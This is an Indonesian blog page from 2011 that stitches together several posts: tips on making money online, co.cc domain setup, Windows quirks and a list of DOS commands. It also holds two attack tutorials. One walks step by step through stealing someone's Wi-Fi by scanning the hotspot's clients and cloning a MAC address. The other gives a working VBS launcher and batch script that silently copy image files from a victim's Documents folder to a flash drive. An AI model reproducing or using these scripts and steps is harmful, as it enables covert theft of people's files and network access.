Tetapi cara seperti itu terlalu ekstrim dan kurang gaul dalam penggunaan komputer sehari-hari karena biasanya kita melakukan pertukaran data atau file dengan komputer lain baik berupa file pekerjaan, file gambar, file attachment, file musik, file video, dan lain sebagainya.
Jadi untuk menghindari komputer kita diinfeksi dan terserang virus maka kita harus waspada dalam berinteraksi dengan file dari komputer lain, file dari media penyimpanan dari orang lain, attachment email, pertukaran file jaringan, lubang keamanan komputer kita, dan lain-lain. Pasang antivirus yang bagus yang diupdate secara berkala serta program firewall untuk jaringan seperti spyware dan adware untuk menanggulangi jenis gangguan komputer lain.

Cara Ngehack Koneksi Wi-Fi

Wah kali ini infonya bagaimana cara ngehack koneksi Wi-Fi biar bisa internetan gratis!!. Sebelumnya saya berpesan gunakan cara ini sesuai kebutuhan anda saja jangan keterlaluan ntar kasihan yang bayar wkwkwkw!! Tip ini hanya sebagai pelajaran buat yang ingin coba coba ngehack koneksi Wi-Fi.
Oke yang anda butuhkan disini tentunya seperangkat komputer atau laptop yang dilengkapi dengan modem Wi-Fi. Caranya :


  • Download software yang diperlukan untuk modal anda ngehack Wi-Fi--->Download.
  • Setelah di download, tentunya harus anda instal kedua software tadi.
  • Cari lokasi hotspot atau lokasi yang sinyal Wi-Fi nya yg bisa anda deteksi.
  • Kemudian hidupkan laptop atau kompi anda dan buka Wireless Network dan lihat di sistem tray icon wireless network, lalu klik kanan pilih view Availible Wireless Network kemudian anda connect ke sinyal Wi-Fi yang terdeteksi oleh laptop anda.
  • Setelah connect,klik kanan sistem tray dan pilih status pada langkah ini anda akan mendapatkan alamat IP yg diberikan kepada kita.Catat IP nya.
  • Berikutnya buka software IP Scanner yg anda download tadi, masukan no Ip yang anda catat tadi misalnya xxx.xxx.x.xx pada kolom IP Range pertama,tetapi pada angka terakhir IP yg anda dapatkan tadi di ganti dengan angka 1, misalnya xxx.xxx.x.xx menjadi xxx.xxx.x.1 lalu pada kolom IP Range kedua masukkan juga IP yg sama tetapi ganti angka 1 menjadi angka 300.maka pada kolom IP Range kedua Ip nya menjadi xxx.xxx.x.300 lalu klik tombol start untuk memulai scanning IP ( Tombol Merah ).
Untuk lebih jelas lihat screen shot nya :

  • Setelah melakukan scanning maka kita akan mendapatkan data IP yang hidup dan terkoneksi dengan hotspot tersebut.Kemudian lihat IP yang hidup (alive host) yang warna biru. lalu klik kanan pada IP yg hidup tadi warna biru hasilnya --> Show--> Mac Address jika berhasil maka akan muncul kode Mac Address ( Catatan : Terkadang Tidak Muncul Kode Mac Addressnya coba lagi IP lainnya )Jika anda berhasil mendapatkan kode Mac Address . Catat Kodenya.
  • Kemudian buka Software TMAC v5 R3 yang anda download dan instal ke laptop anda. Cari tombol Change MAC maka akan muncul kolom tempat anda memasukkan kode Mac Adrress yang anda catat tadi.Kemudian tekan Change Now. Untuk lebih jelas lihat Screen shotnya :

Tunggu beberapa saat untuk proses penggantian kode Mac Adrressnya dan koneksi akan terputus sementara dan akan terkoneksi lagi secara otomatis.

  • Langkah terakhir tentunya seperti yang anda harafkan yaitu koneksi internet gratis dengan membuka browsing anda.
  • Selamat menambah dosa anda karena telah melakukan pencurian koneksi Wi-Fi orang lain.Catatan dosanya anda tanggung sendiri ya!! wkwkwkwkwkw.
Trik diatas bukan bermaksud mengajarkan anda berbuat jahat! tetapi sebagai pembelajaran bagi anda bahwa semua sistem keamanan Wi-Fi bisa di hack!!!

Kamis, 07 April 2011

Belajar bisnis Online

kapan lagi kita bisa ngehasilin uang sendiri....
saatnya kita untuk mandiri. Dibawah ini adalah panduan untuk sobat para pemula untuk bisa ngasilin uang dari berinternet ria dan dijamin gak bayar (GRATIS)...
Anda tidak perlu bayar apapun untuk memulai bisnis online anda. Karena anda bisa memulai bisnis online anda secara gratis atau tanpa modal.





Ada banyak sekali jenis Bisnis Online yaitu :
  • Bisnis Affiliate Marketing 
Bisnis ini menawarkan suatu bentuk kerjasama antara situs tersebut dengan kamu bekerja sebagai agen penjual atau sales online. Tugasnya memasarkan dan mempromosikan produk mereka. Kamu akan mendapatkan komisi dengan menjualkan produk tersebut. Prosentase komisi yang diberikan sangat beragam tergantung situs yang berkaitan. Mulai dari 30% hingga 80% dari harga produk. Komisi besar biasanya terjadi pada produk-produk non fisik seperti ebook atau software. Sekarang sudah banyak yang jualan e-book dan bissnis ini cukup menjanjikan.
  • Bisnis Reseller
Bisnis seperti ini nyaris sama dengan bisnis di atas namun untuk memulainya kamu harus bergabung dan mengikuti sistem produk yang telah mereka tetapkan.
  • Jual Produk Informasi
Kamu bisa menjual jasa informasi tentang ilmu ataupun keahlian yang kamu miliki dan bisa juga ilmu yang kamu dapatkan dari orang lain. Semua informasi tadi dikumpulkan menjadi satu untuk produk akhirnya adalah e-book yang akan kamu jual. Hmm, dilematis sekali memang. Padahal menurutku, informasi itu adalah gratis bila sudah menyangkut informasi di internet.
  • Advertising Business
Khusus untuk bisnis iklan, menurut ku sangat beragam dan masih bisa dibedakan lagi. Saat ini bisnis periklanan sudah ramai dan sedang hot di internet. Kamu bisa menjadi orang yang menyediakan jasa untuk mempertemukan antara si pemilik produk untuk dijual atau advertiser dan orang yang menayangkan iklan mereka melalui web atau situs pribadinya disebut publisher. Misalkan saja kamu memasang beberapa baner iklan atau text ads berupa iklan teks baris di blog atau situsmu maka kamu disebut sebagai publisher. Jadi semua dapat bagian bayaran. Baik itu dia sebagai media jasa periklanan atau agen periklanan, perusahaan ataupun perorangan yang ingin menjual produknya disebut advertiser dan sipenayang iklan atau publisher.
  • Paid To Survey
Adalah melakukan survey online di internet dan bayarannya tidak besar tapi menjanjikan.
  • Paid To Click
Adalah mengklik iklan yang disediakan oleh situs dan melihat tayangan iklan tersebut, biasanya selama 30 detik dan setelah itu kamu mendapat bayaran. Salah satunya seperti ClixSense yang masih kuikuti.

  • Paid To Review
Adalah mendapatkan uang dengan cara memberikan review berupa tulisan pada blog atau situs-mu tentang produk orang lain. Jadi ulasanmu dihargai dengan uang. Contohnya sngat banyak. Seperti SponsoredReviews, Buy Blog Review, Blogvertise dan AdReviewCamp.
  • Toko Oline
Menjual barang melalui internet.
  • Content Writer
Bila kamu mempunyai keahlian menulis artikel, maka kamu bisa mendapatkan uang dengan menjual jasa sebagai penulis bayaran di situs ataupun blog orang lain. Cukup mudah dan sederhana.
  • Jasa Online
Menyediakan jasa yang bermanfaat bagi orang lain. Contohnya jasa web hosting, jasa pembuat web site atau website designer, jasa kursus online seperti khursus bahasa programer, jasa konsultan dan banyak lagi. Ada yang menyediakan jasa domain gratis dan juga hosting gratis oleh situs luar negeri. Saya sudah coba dan layanannya sangat baik. Kamu bisa mencobanya.
  • Menjual website ataupun Blog
Ada beberaqpa kondisi dimana setelah website, situs ataupun blog terkenal untuk kemudian dijual kepada orang lain. Sayang ya..? Tapi itulah bisnis online dengan menjual blog. 
  • Investasi Online
Menginvestasikan sejumlah uang di internet untuk melipatgandakannya. Warning, untuk yang satu ini tidak sedikit yang tipu-tipu. Investasi online antara lain adalah Forex online trading, Saham online trading, Be options winner. 
  • Bisnis seperti MLM
Sudah banyak di internet yang menawarkan bisnis cepat kaya atau get rich quick program. Hati-hati sobat, banyak juga yang tipu-tipu. Scam, hype dan berbahaya, waspadalah selalu.

  • Domain Parking  
Membeli domain lalu dipasangi iklan di dalamnya. Bingung apa itu domain? Domain adalah nama situs. Contohnya www.namadomainkamu.com

Selain jenis-jenis bisnis online di atas, sebenarnya masih banyak lagi yang lain. Bisa jadi hari ini bisnis tersebut tidak berlaku lagi dan besok muncul bisnis yang baru. Semuanya serba dinamis dan selalu ada yang baru. Rekomendasi, untuk kamu yang ingin mencoba terjun ataupun sedang meraba-raba tentang bisnis online maka cobalah untuk bermain di bisnis periklanan. Kita sebagai blogger sangat cocok untuk memulai bisnis ini sebagai publisher atau penayang iklan. Sistem nya, kamu dibayar setiap iklan yang kamu tayangkan di blogmu di klik orang. Berapa nilainya..? Hmm, beragam dan tergantung iklan yang ditayangkan. Bisnis periklanan atau advertising business adalah yang paling digemari dan tren saat ini. Hampir semua situs seperti facebook dan situs besar lainnya menyediakan ruang situsnya untuk menayangkan iklan produk orang lain. Kamu juga bisa koq melalui blogmu untuk menayangkan iklan produk. Intinya, bisnis online adalah bisnis yang dilakukan lewat media internet. Semoga bermanfaat.
 

Rabu, 06 April 2011

Trik mencuri data ke Flash disk secara diam diam

Jika sobat penasaran ingin membuatnya yuk saya ajarkan !!
Trik mencuri data ke Flash disk secara diam diam

1.Buka notepad, buat file vbs ketik atau copy paste script berikut:

dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshshell.expandenvironmentstrings("%coms...
wshshell.run (dos & " /c tarik.bat"), vbhide

2.Simpan dengan file name nya contoh start.vbs save as typenya pilih all files

3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:

@echo off
mkdir %computername%
xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" %computername% /s/c/q/r
@cls
@exit

4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all files.

5.Nama file bat ini harus sesuai dengan script file vbs baris ke empat (tarik.bat)

6.Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.

7.Selesai dech Trik mencuri data ke Flash disk secara diam diam

Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.
Fungsi file vbs (start.vbs) berfungsi untuk menjalankan file bat (tarik.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (tarik.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target.

Contoh tersebuat diatas adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. anda bisa meng edit sendiri kedua file tsb diatas sesuai keperluan format file dan folder target yg akan di copy.
Jadi kesimpulannya kita dapat mencuri data diam diam karena kita tidak menggunakan copy paste yang seperti biasa namun menggunakan cmd jadi pada saat mencopy tidak aka ada yang tahu, kalau masalah kecepatan mencopynya sepertinya sama saja dengan yang copy paste normal.

SETTING DOMAIN BLOGSPOT WITH CO.CC DOMAIN

CO.CC:Free DomainBagi anda yang ingin memiliki sebuah situs atau website secara gratis, tidak perlu lagi kuatir. Karena sudah banyak domain dan web hosting dengan layanan gratis. Walaupun tidak sebagus yang berbayar, tapi layanan yang diberikan tetap bagus.
Nah, pada tutorial kali ini, saya akan menjelaskan bagaimana cara membuat website gratis dengan domain co.cc. Domain co.cc merupakan domain gratis yang paling banyak digunakan saat ini. Kualitasnya tidak kalah dengan domain berbayar seperti domain .com, .net, .org, dan sebagainya.
Langsung saja lihat cara mendaftar dan cara setting domain co.cc di bawah ini.


Cara mendaftar di CO.cc

  1. Kunjungi CO.cc
  2. Pilih menu Getting A New Domain atau langsung saja melalui kotak yang ada pada halaman depan.
  3. Isi nama domain yang anda inginkan.
  4. Klik tombol check availability.
  5. Jika domain sudah dipakai, coba lagi dengan domain lain. Jika domain tersedia, klik tombol continue to registration.
  6. Jika anda belum mendaftar, klik tulisan Create an account now yang ada dibagian bawah.
  7. Isi formulir pendaftaran dan beri tanda centang pada tulisan "I accept the Terms of Service".
  8. Setelah itu klik tombol Create an account now.
Proses pendaftaran sudah selesai. Sekarang yang perlu anda lakukan, yaitu mengatur atau men-setting domain co.cc baru anda.


Cara setting domain CO.cc

Untuk melakukan penyetingan domain, klik tombol setup setelah selesai mendaftar tadi atau bisa juga dengan mengklik menu Domain Settings dibagian kiri menu. Setelah itu pilih domain yang akan diatur. Kemudian klik tombol setup.

A. Name Server
Pertama yang harus anda lakukan untuk "name server" setelah mendaftar di web hosting, yaitu mencari name server pada web hosting tersebut yang biasanya terdiri dari 2 name server. Contoh umum name server adalah: ns1.hostname.com dan ns2.hostname.com.

  1. Daftarkan domain co.cc yang telah didaftar ke web hosting anda.
  2. Cari name server di web hosting anda (biasanya terletak di pengaturan domain).
  3. Jika sudah menemukan, isi kedua kotak untuk name server tadi.
  4. Klik tombol Set up.
B. Zone Records
Zone records ini bisa digunakan untuk mengganti domain lama anda. Zone records sering digunakan untuk mengubah domain .blogspot ke domain co.cc.



Host, isi dengan domain co.cc anda (jangan lupa pakai www).

TTL, biarkan tetap 1 D.

Type, pilih CNAME.

Value, ketik ghs.google.com.

C. URL Forwarding
URL forwarding digunakan untuk mengalihkan domain co.cc ke domain asli anda (redirect domain).

  1. Pada kotak Redirect To, isi dengan url tujuan.
  2. Di bagian Page Title, isi dengan judul website anda.
  3. Pada bagian Frame, pilih sesuai keinginan.
  4. Setelah itu, isi deskripsi dan keyword website anda.
  5. Klik tombol Set up.

Setelah itu lanjut ke pengaturan di blogger. Ikuti petunjuk setting domain co.cc di blogspot di bawah ini.

  1. Masuk ke akun blogger anda.
  2. Pilih menu Settings (Pengaturan) » Publishing (Publikasikan).
  3. Klik tulisan Custom Domain.
  4. Klik tulisan Switch to advanced settings.
    Custom domain blogspot
  5. Di kolom Your Domain, isi dengan domain co.cc anda tadi (masih dengan www).
  6. Terakhir isi kolom Word Verification dan simpan.
Cukup sampai di situ saja cara mengganti domain blogspot dengan co.cc. Setelah selesai mengikuti tutorial di atas, blog anda tidak bisa dibuka untuk sementara waktu.

Waktu yang diperlukan untuk bisa mengakses blog dengan domain baru anda biasanya hanya sebentar. Mungkin hanya beberapa menit ataupun beberapa jam, maksimal 2 hari.

Cara Mengukur Berat Dan Loading Blog

Cara Mengukur Berat Dan Loading Blog ini cukup mudah, caranya kamu hanya harus membuka link ini kalau sudah buka link itu, d bawah ada kotak, isi kotak itu dengan domain mu, kalau sudah klik check nanti di situ di terangkan berat blog/webmu, dan berapa kecepatannya.

Selasa, 05 April 2011

"Keanehan" pada Windows dan Penjelasannya

Aneh 1:
Seorang orang indian menemukan bahwa tidak seorangpun pengguna windows dapat membuat folder dengan nama "CON" ( tanpa tanda petik ) dan team dari microsoft pun tidak bisa menjelaskan apa alasannya.
Silahkan coba buat.

Penjelasan:
Di Windows Nama folder dan Special System Variables berbagi dengan tampilan yang sama, karena itulah ketika anda membuat folder dengan nama System Variable akan dianggap folder tersebut sudah ada.
Karena itulah anda juga tidak bisa menamai folder anda dengan
CON, NUL, COM1, COM2, COM3, LPT1, LPT2, LPT3, COM1 hingga COM9 dan LPT1 hingga LPT9….


CON berarti console
COM1 berarti serial port 1
LPT1 berarti parallel port 1
Ini jg berlaku di Linux, dimana hardware resource direpresentasikan layaknya suatu file. Misalnya: /dev/tty, /dev/null dsb. Tapi kita tetep bisa kok bikin folder CON, caranya:
- buka command prompt
- ketik “mkdir \\.\c:\con”
- akses direktori “dir \\.\c:\con”
- hapus direktori “rmdir \\.\c:\con”

Aneh 2:
1.) Buka lembar kerja notepad yang masih kosong
2.) Ketikan kata berikut "Bush hid the facts" (tanpa tanda petik)
3.) Save file tersebut dengan nama bebas.txt
4.) kemudian tutup file, dan buka kembali
Perhatikan apa yang terjadi?

Penjelasan:
Bukan cuma kalimat ‘bush hid the facts’ yang ‘disembunyikan’ oleh Notepad, kalimat lain seperti misalnya ‘this api can break’, ‘this cat can split’, ‘jane can not dance’, ‘xxxx xxx xxx xxxxx’, dan ‘aaaaaaaa aaaaa aaa aaaaa’ juga mengalami ‘nasib’ yang sama.
ketika kalimat “bush hid the facts” disimpan ke sebuah file, notepad menyimpan tanpa masalah. Bisa dibuktikan dengan membuka file tersebut dengan editor lain, misalnya wordpad. Masalah baru muncul waktu file tsb dibuka oleh notepad itu sendiri. Sebelum membuka file itu, notepad berusaha ngedeteksi encoding yg digunakan. Ternyata algoritma deteksi ini keliru jika file yang dimaksud mengandung kalimat dengan pola 4-3-3-5 karakter sehingga membentuk kode ASCII tertentu. Akibatnya file yg disimpan dalam encoding ANSI tsb malah dibuka dalam encoding UTF-16.

Aneh 3:
ditemukan oleh seseorang dari brazil.
buka Microsoft Word dan ketikan
=rand (200, 99)
kemudian tekan enter ENTER
dan lihat keanehan yang terjadi.

Penjelasan:
Kenehan ini sering dianggap bug pada Microsoft Office Word, namun sebenarnya hal-hal semacam ini merupakan hal yang lumrah yang dimasukkan oleh programer dalam mengetes atau sekedar iseng pada suatu produk. Karena programernya kebanyakan geek, dan gila game, maka muncullah kalimat “The quick brown fox jumps over the lazy dog” yang berulang pada kode itu. Hal-hal ini disembunyikan dan dapat diakses dengan cara-cara/trik-trik tertentu. Ini disebut “easter egg”. Trik di word itu salah satu easter egg.
rand berarti random
angka (200,99), 200 berarti paragraf, dan 99 berarti 99 kalimat per paragraf.
Coba anda ubah menjadi (1,1) atau angka lainnya, hasilnya akan berbeda.

Daftar lengkap perintah DOS

DOS (Disk Operating System) adalah sistem operasi berbasis teks yang dikeluarkan microsoft sebelum windows. Sama seperti Terminal di Linux, DOS memiliki daftar perintah berbasis teks yang harus diketik di Console DOS atau lazim disebut Command Prompt. Mengetahui penggunaan perintah DOS adalah pengetahuan tersendiri yang perlu dipahami oleh administrator jaringan berbasis windows. Anda akan lebih mudah menguasai NetBios Hacking atau remote komputer berbasis console di windows dengan mengetahui perintah- perintah DOS. Berikut daftar lengkap perintah DOS beserta fungsinya :

  • ADDUSERS : Menambah/melihat daftar user melalui CSV file
  • ARP : Address Resolution Protocol
  • ASSOC : Mengganti ekstensi file asosiasi
  • ASSOCIAT : Menjalankan file asosiasi satu langkah
  • AT : Menjadwalkan perintah yang akan dijalankan lain waktu
  • ATTRIB : Mengganti attribut file
  • BOOTCFG : Mengedit pengaturan Windows boot
  • BROWSTAT : Mengambil domain, browser dan PDC info
  • CACLS : Mengganti permision file
  • CALL : Memanggil salah satu program dari kelompok program
  • CD : Pindah direktori/pindah folder
  • CHANGE : Mengganti properties Terminal Server Session
  • CHKDSK : Cek disk/harddisk dan memperbaiki permasalah harddisk
  • CHKNTFS : Cek NTFS file system
  • CHOICE : Menyetujui/memilih tombol input keyboard untuk memanggil file
  • CIPHER : Enkripsi/dekripsi file atau folder
  • CleanMgr : Menghapus otomatis temporary file termasuk recycle bin
  • CLEARMEM : Menghapus/membersihkan memory
  • CLIP : Mengcopy STDIN ke Windows clipboard.
  • CLS : Membersihkan/menghilangkan layar
  • CLUSTER : Clustering Windows
  • CMD : Memulai/membuka command prompt
  • COLOR : Mengganti warna layar command prompt
  • COMP : Membandingkan isi dua file atau lebih
  • COMPACT : Mengompress file atau folder pada partisi NTFS
  • COMPRESS : Mengompress sebuah file pada partisis NTFS
  • CON2PRT : Menghubungkan atau memutus koneksi printer
  • CONVERT : Mengganti dari partisi FAT ke NTFS.
  • COPY : Mencopy satu atau lebih files
  • CSVDE : Import/Export Active Directory data
  • DATE : Menampilkan tanggal
  • Dcomcnfg : DCOM Configuration Utility
  • DEFRAG : Mendefragmen harddisk
  • DEL : Menghapus file
  • DELPROF : Menghapus profil user NT
  • DELTREE : Menghapus folder dan subfolder
  • DevCon : Device Manager Command Line Utility
  • DIR : Menampilkan daftar file dan folder
  • DIRUSE : Menampilkan daftar disk yang terpakai
  • DISKCOMP : Membandingkan isi dua buah floppy disk
  • DISKCOPY : Mengcopy isi Floppy disk
  • DNSSTAT : DNS Statistik
  • DOSKEY : Mengedit baris perintah, memanggil ulang perintah, dan membuat macros
  • DSADD : Menambah user dan grup komputer di active directory
  • DSQUERY : Menampilkan daftar item di active directory
  • DSMOD : Memodifikasi user dan grup komputer di active directory
  • ECHO : Menampilkan pesan di layar
  • ENDLOCAL : Menampilkan perubahan pada akhir kelompok file
  • ERASE : Menghapus satu atau lebih file
  • EXIT : Keluar dari commant prompt
  • EXPAND : Menggelar file
  • EXTRACT : Mengekstrak file
  • FC : Membandingkan dua file
  • FDISK : Menampilkan format disk dan partisi
  • FIND : Mencari sebuah file 
  • FINDSTR : Mencari file berdasarkan potongan kata 
  • FOR : Menampilkan kondisi terakhir yang terjadi pada waktu terakhir 
  • FORFILES : Menampilkan proses kelompok file 
  • FORMAT : Memformat disk 
  • FREEDISK : Melihat kapasitas disk yang kosong 
  • FSUTIL : Utilitas file dan volume file 
  • FTP : File Transfer Protocol
  • FTYPE : Menampilkan atau mengganti ekstensi file 
  • GLOBAL : Menampilkan user dari grup global 
  • GOTO : Mengakses langsung kelompok program melalui label program pada command line 
  • HELP : Bantuan 
  • HFNETCHK : Network Security Hotfix Checker 
  • IF : Salah satu perintah kondisi 
  • IFMEMBER : Kondisi salah satu user di NT Workgroup
  • IPCONFIG : Konfigurasi IP (Internet Protocol) 
  • KILL : Mematikan/menghapus program yang sedang berjalan di memory 
  • LABEL : Mengganti label disk 
  • LOCAL : Menampilkan anggota sebuah grup 
  • LOGEVENT : Menulis file di NT event viewer. 
  • LOGOFF : Logoff 
  • LOGTIME : Menampilkan Log tanggal dan waktu pada sebuah file 
  • MAPISEND : Mengirim e-mail dengan baris perintah
  • MEM : Menampilkan memori yang terpakai 
  • MD : Membuat sebuah folder 
  • MODE : Mengkonfigurasi system device
  • MORE : Menampilakn output/hasil berikutnya dilayar
  • MOUNTVOL : Manajemen volume mount point 
  • MOVE : Memindahkan file 
  • MOVEUSER : Memindahkan user 
  • MSG : Mengirim pesan 
  • MSIEXEC : Microsoft Windows Installer 
  • MSINFO : Windows NT diagnosik 
  • MSTSC : Terminal Server Connection (Remote Desktop Protocol) 
  • MUNGE : Mencari dan mereplika teks dalam sebuah file 
  • MV : Mencopy file yang sedang aktif 
  • NET : Manajemen jaringan yang digunakan
  • NETDOM : Domain Manager 
  • NETSH : Mengkonfigurasi network protocols 
  • NETSVC : Daftar perintah Service Controller
  • NBTSTAT : Menampilkan statistik jaringan (NetBIOS TCP/IP) 
  • NETSTAT : Menampilkan statistik jaringan (TCP/IP) 
  • NOW : Menampilkan tanggal dan waktu sekarang
  • NSLOOKUP : Name server lookup 
  • NTBACKUP : Membackup file 
  • NTRIGHTS : Mengedit user 
  • PATH : Menampilkan alamat (path) sebuah program 
  • PATHPING : Menelusuri jejak koneksi yang terganggu dan kehilangan paket
  • PAUSE : Mengentikan proses sejenak pada program atau perintah yang sedang berjalan 
  • PERMS : Menampilkan user permition 
  • PERFMON : Memonitor permorma 
  • PING : Mengetes koneksi jaringan 
  • POPD : Restore ke harga awal pada direktori asli berdasarkan PUSHD
  • PORTQRY : Menampilkan status port dan services 
  • PRINT : Mencetak teks
  • PRNCNFG : Menampilkan, mengkonfigurasi atau mengganti nama printer 
  • PRNMNGR : Menambah, menghapus atau mendefault printer 
  • PROMPT : Mengganti perintah 
  • PsExec : Mengeksekusi proses secara remote 
  • PsFile : Menampilkan file yang terbuka secara remote 
  • PsGetSid : Menampilkan SID komputer pengguna
  • PsInfo : Menampilkan informasi sistem komputer 
  • PsKill : Mematikan proses berdasarkan nama atau ID proses 
  • PsList : Menampilkan detail proses yang sedang berjalan 
  • PsLoggedOn : Melihat siapa yang sedang Logon baik local maupun sharing 
  • PsLogList : Menampilkan rekaman LOG 
  • PsPasswd : Mengganti password account 
  • PsService : Menampilkan dan mengontrol services 
  • PsShutdown : Shutdown atau merestart komputer 
  • PsSuspend : Suspend 
  • PUSHD : Menyimpan kemudian mengganti pada direktori asli 
  • QGREP : Mencari file berdasarkan pola 
  • RASDIAL : Manajemen RAS connections 
  • RASPHONE : Manajemen RAS connections 
  • RECOVER : Merecover file yang rusak dari disk 
  • REG : Membaca, mengeset atau menghapus registry key atau value 
  • REGEDIT : Mengimpor/eksport pengaturan registry 
  • REGSVR32 : Register atau unregister DLL file 
  • REGINI : Mengganti Registry Permissions 
  • REM : Merekam komentar pada kelompok file 
  • REN : Mengganti nama file 
  • REPLACE : Menindih (replace) atau mengupdate file dengan file lainya 
  • RD : Menghapus folder 
  • RDISK : Membuat Recovery Disk 
  • RMTSHARE : Sharing folder atau printer 
  • ROBOCOPY : Menyalin file atau folder secara keseluruhan (asli) 
  • ROUTE : Manipulasi network routing tabel 
  • RUNAS : Menjalankan program pada user account berbeda 
  • RUNDLL32 : Menjalankan perintah DLL32
  • SC : Service Control 
  • SCHTASKS : Membuat atau mengedit schedule task 
  • SCLIST : Menampilkan service NT yang sedang berjalan 
  • ScriptIt : Mengontrol aplikasi GUI 
  • SET : Menampilkan, mengeset atau menghapus variabel tertentu 
  • SETLOCAL : Mengubah local konfigurasi sementara pada kelompok file 
  • SETX : Mengatur konfigurasi variabel secara permanen 
  • SHARE : Menampilkan atau mengedit data/printer sharing 
  • SHIFT : Menyisipkan parameter pada kelompok file 
  • SHORTCUT : Membuat shortcut file 
  • SHOWGRPS : Menampilkan NT Workgroups user yang tergabung 
  • SHOWMBRS : Menampilkan keanggotaan user pada sebuah workgroup 
  • SHUTDOWN : Mematikan komputer 
  • SLEEP : Mematikan sementara (x second) 
  • SOON : Menjadwalkan perintah agar berjalan pada waktu yang akan datang 
  • SORT : Sort input
  • START : Menjalankan program tertentu pada jendela terpisah 
  • SU : Switch User 
  • SUBINACL : Edit file, folder Permissions, Ownership dan Domain 
  • SUBST : Mengurutkan lokasi berdasarkan drive letter 
  • SYSTEMINFO : Menampilkan daftar konfigurasi sistem 
  • TASKLIST : Menampilkan daftar aplikasi dan service yang sedang berjalan
  • TIME : Menampilkan atau mengkonfigurasi tanggal/waktu 
  • TIMEOUT : Penundaan proses
  • TITLE : Mengatur judul jendela CMD.EXE pada waktu berjalan 
  • TOUCH : Mengganti stempel waktu (timestamps) file 
  • TRACERT : Menelusuri route jaringan pada remote host 
  • TREE : Menampilkan folder terstruktur pada mode grafis
  • TYPE : Menampilkan isi sebuah file 
  • USRSTAT : Menampilkan daftar nama domain dan sesi login terakhir 
  • VER : Menampilkan informasi versi 
  • VERIFY : Memverifikasi file yang telah disimpan 
  • VOL : Menampilkan label disk
  • WHERE : Menentukan dan menampilkan lokasi file pada stuktur direktori 
  • WHOAMI : Menampilkan UserName dan domain sebenarnya 
  • WINDIFF : Membandingkan isi dua buah file dan konfigurasinya 
  • WINMSD : Diagnosa sistem windows
  • WINMSDP : Diagnosa sistem windows lainya 
  • WMIC : Perintah WMI 
  • XCACLS : Mengganti file permission 
  • XCOPY : mengcopy files dan folder

 
Powered by ∆LMERI∆